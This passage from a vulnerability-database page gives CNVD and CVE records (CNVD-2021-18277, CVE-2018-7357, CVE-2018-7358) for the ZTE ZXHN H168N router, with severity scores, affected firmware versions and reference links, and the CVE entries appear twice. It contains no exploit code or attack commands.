          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-2028",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "zxhn h168n",
            "scope": null,
            "trust": 0.6,
            "vendor": "zte",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18277"
          }
        ]
      },
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2021-18277",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "CNVD",
                "id": "CNVD-2021-18277",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18277"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ZTE Corporation is the world\u0027s leading provider of integrated communications solutions.\n\r\n\r\nZTE Corporation ZXHN H168N has a command execution vulnerability. Attackers can use this vulnerability to execute arbitrary commands.",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18277"
          }
        ],
        "trust": 0.6
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18277",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18277"
          }
        ]
      },
      "id": "VAR-202104-2028",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18277"
          }
        ],
        "trust": 0.97662336
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18277"
          }
        ]
      },
      "last_update_date": "2022-05-04T08:52:06.021000Z",
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18277"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-18277"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-18277"
          }
        ]
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Command execution vulnerability exists in ZXHN H168N of ZTE Corporation",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-18277"
          }
        ],
        "trust": 0.6
      }
    }

    CVE-2018-7358 (GCVE-0-2018-7358)

    Vulnerability from nvd – Published: 2018-11-14 15:00 – Updated: 2024-08-05 06:24
    VLAI
    Summary
    ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations.
    CWE
    • Improper Authorization
    Assigner
    zte
    References
    Impacted products
    Vendor Product Version
    ZTE ZXHN H168N Affected: V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T
    Create a notification for this product.
    Date Public
    2018-11-14 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T06:24:11.858Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "105963",
                "tags": [
                  "vdb-entry",
                  "x_refsource_BID",
                  "x_transferred"
                ],
                "url": "http://www.securityfocus.com/bid/105963"
              },
              {
                "name": "45972",
                "tags": [
                  "exploit",
                  "x_refsource_EXPLOIT-DB",
                  "x_transferred"
                ],
                "url": "https://www.exploit-db.com/exploits/45972/"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "ZXHN H168N",
              "vendor": "ZTE",
              "versions": [
                {
                  "status": "affected",
                  "version": "V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T"
                }
              ]
            }
          ],
          "datePublic": "2018-11-14T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations."
            }
          ],
          "metrics": [
            {
              "cvssV3_0": {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT_NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Improper Authorization",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-12-12T10:57:01.000Z",
            "orgId": "6786b568-6808-4982-b61f-398b0d9679eb",
            "shortName": "zte"
          },
          "references": [
            {
              "name": "105963",
              "tags": [
                "vdb-entry",
                "x_refsource_BID"
              ],
              "url": "http://www.securityfocus.com/bid/105963"
            },
            {
              "name": "45972",
              "tags": [
                "exploit",
                "x_refsource_EXPLOIT-DB"
              ],
              "url": "https://www.exploit-db.com/exploits/45972/"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@zte.com.cn",
              "ID": "CVE-2018-7358",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "ZXHN H168N",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "ZTE"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations."
                }
              ]
            },
            "impact": {
              "cvss": {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT_NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.0"
              }
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Improper Authorization"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "105963",
                  "refsource": "BID",
                  "url": "http://www.securityfocus.com/bid/105963"
                },
                {
                  "name": "45972",
                  "refsource": "EXPLOIT-DB",
                  "url": "https://www.exploit-db.com/exploits/45972/"
                },
                {
                  "name": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523",
                  "refsource": "CONFIRM",
                  "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
                }
              ]
            },
            "source": {
              "discovery": "UNKNOWN"
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "6786b568-6808-4982-b61f-398b0d9679eb",
        "assignerShortName": "zte",
        "cveId": "CVE-2018-7358",
        "datePublished": "2018-11-14T15:00:00.000Z",
        "dateReserved": "2018-02-22T00:00:00.000Z",
        "dateUpdated": "2024-08-05T06:24:11.858Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-7357 (GCVE-0-2018-7357)

    Vulnerability from nvd – Published: 2018-11-14 15:00 – Updated: 2024-08-05 06:24
    VLAI
    Summary
    ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper access control vulnerability, which may allow an unauthorized user to gain unauthorized access.
    CWE
    • Improper Authorization
    Assigner
    zte
    References
    Impacted products
    Vendor Product Version
    ZTE ZXHN H168N Affected: V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T
    Create a notification for this product.
    Date Public
    2018-11-14 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T06:24:12.002Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "45972",
                "tags": [
                  "exploit",
                  "x_refsource_EXPLOIT-DB",
                  "x_transferred"
                ],
                "url": "https://www.exploit-db.com/exploits/45972/"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "ZXHN H168N",
              "vendor": "ZTE",
              "versions": [
                {
                  "status": "affected",
                  "version": "V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T"
                }
              ]
            }
          ],
          "datePublic": "2018-11-14T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper access control vulnerability, which may allow an unauthorized user to gain unauthorized access."
            }
          ],
          "metrics": [
            {
              "cvssV3_0": {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT_NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Improper Authorization",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-12-12T10:57:01.000Z",
            "orgId": "6786b568-6808-4982-b61f-398b0d9679eb",
            "shortName": "zte"
          },
          "references": [
            {
              "name": "45972",
              "tags": [
                "exploit",
                "x_refsource_EXPLOIT-DB"
              ],
              "url": "https://www.exploit-db.com/exploits/45972/"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@zte.com.cn",
              "ID": "CVE-2018-7357",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "ZXHN H168N",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "ZTE"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper access control vulnerability, which may allow an unauthorized user to gain unauthorized access."
                }
              ]
            },
            "impact": {
              "cvss": {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT_NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Improper Authorization"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "45972",
                  "refsource": "EXPLOIT-DB",
                  "url": "https://www.exploit-db.com/exploits/45972/"
                },
                {
                  "name": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523",
                  "refsource": "CONFIRM",
                  "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
                }
              ]
            },
            "source": {
              "discovery": "UNKNOWN"
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "6786b568-6808-4982-b61f-398b0d9679eb",
        "assignerShortName": "zte",
        "cveId": "CVE-2018-7357",
        "datePublished": "2018-11-14T15:00:00.000Z",
        "dateReserved": "2018-02-22T00:00:00.000Z",
        "dateUpdated": "2024-08-05T06:24:12.002Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-7358 (GCVE-0-2018-7358)

    Vulnerability from cvelistv5 – Published: 2018-11-14 15:00 – Updated: 2024-08-05 06:24
    VLAI
    Summary
    ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations.
    CWE
    • Improper Authorization
    Assigner
    zte
    References
    Impacted products
    Vendor Product Version
    ZTE ZXHN H168N Affected: V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T
    Create a notification for this product.
    Date Public
    2018-11-14 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T06:24:11.858Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "105963",
                "tags": [
                  "vdb-entry",
                  "x_refsource_BID",
                  "x_transferred"
                ],
                "url": "http://www.securityfocus.com/bid/105963"
              },
              {
                "name": "45972",
                "tags": [
                  "exploit",
                  "x_refsource_EXPLOIT-DB",
                  "x_transferred"
                ],
                "url": "https://www.exploit-db.com/exploits/45972/"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "ZXHN H168N",
              "vendor": "ZTE",
              "versions": [
                {
                  "status": "affected",
                  "version": "V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T"
                }
              ]
            }
          ],
          "datePublic": "2018-11-14T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations."
            }
          ],
          "metrics": [
            {
              "cvssV3_0": {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT_NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Improper Authorization",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-12-12T10:57:01.000Z",
            "orgId": "6786b568-6808-4982-b61f-398b0d9679eb",
            "shortName": "zte"
          },
          "references": [
            {
              "name": "105963",
              "tags": [
                "vdb-entry",
                "x_refsource_BID"
              ],
              "url": "http://www.securityfocus.com/bid/105963"
            },
            {
              "name": "45972",
              "tags": [
                "exploit",
                "x_refsource_EXPLOIT-DB"
              ],
              "url": "https://www.exploit-db.com/exploits/45972/"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@zte.com.cn",
              "ID": "CVE-2018-7358",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "ZXHN H168N",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "ZTE"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations."
                }
              ]
            },
            "impact": {
              "cvss": {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT_NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.0"
              }
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Improper Authorization"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "105963",
                  "refsource": "BID",
                  "url": "http://www.securityfocus.com/bid/105963"
                },
                {
                  "name": "45972",
                  "refsource": "EXPLOIT-DB",
                  "url": "https://www.exploit-db.com/exploits/45972/"
                },
                {
                  "name": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523",
                  "refsource": "CONFIRM",
                  "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
                }
              ]
            },
            "source": {
              "discovery": "UNKNOWN"
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "6786b568-6808-4982-b61f-398b0d9679eb",
        "assignerShortName": "zte",
        "cveId": "CVE-2018-7358",
        "datePublished": "2018-11-14T15:00:00.000Z",
        "dateReserved": "2018-02-22T00:00:00.000Z",
        "dateUpdated": "2024-08-05T06:24:11.858Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-7357 (GCVE-0-2018-7357)

    Vulnerability from cvelistv5 – Published: 2018-11-14 15:00 – Updated: 2024-08-05 06:24
    VLAI
    Summary
    ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper access control vulnerability, which may allow an unauthorized user to gain unauthorized access.
    CWE
    • Improper Authorization
    Assigner
    zte
    References
    Impacted products
    Vendor Product Version
    ZTE ZXHN H168N Affected: V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T
    Create a notification for this product.
    Date Public
    2018-11-14 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T06:24:12.002Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "45972",
                "tags": [
                  "exploit",
                  "x_refsource_EXPLOIT-DB",
                  "x_transferred"
                ],
                "url": "https://www.exploit-db.com/exploits/45972/"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "ZXHN H168N",
              "vendor": "ZTE",
              "versions": [
                {
                  "status": "affected",
                  "version": "V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T"
                }
              ]
            }
          ],
          "datePublic": "2018-11-14T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper access control vulnerability, which may allow an unauthorized user to gain unauthorized access."
            }
          ],
          "metrics": [
            {
              "cvssV3_0": {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT_NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Improper Authorization",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-12-12T10:57:01.000Z",
            "orgId": "6786b568-6808-4982-b61f-398b0d9679eb",
            "shortName": "zte"
          },
          "references": [
            {
              "name": "45972",
              "tags": [
                "exploit",
                "x_refsource_EXPLOIT-DB"
              ],
              "url": "https://www.exploit-db.com/exploits/45972/"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@zte.com.cn",
              "ID": "CVE-2018-7357",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "ZXHN H168N",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "ZTE"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper access control vulnerability, which may allow an unauthorized user to gain unauthorized access."
                }
              ]
            },
            "impact": {
              "cvss": {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT_NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Improper Authorization"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "45972",
                  "refsource": "EXPLOIT-DB",
                  "url": "https://www.exploit-db.com/exploits/45972/"
                },
                {
                  "name": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523",
                  "refsource": "CONFIRM",
                  "url": "http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523"
                }
              ]
            },
            "source": {
              "discovery": "UNKNOWN"
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "6786b568-6808-4982-b61f-398b0d9679eb",
        "assignerShortName": "zte",
        "cveId": "CVE-2018-7357",
        "datePublished": "2018-11-14T15:00:00.000Z",
        "dateReserved": "2018-02-22T00:00:00.000Z",
        "dateUpdated": "2024-08-05T06:24:12.002Z",
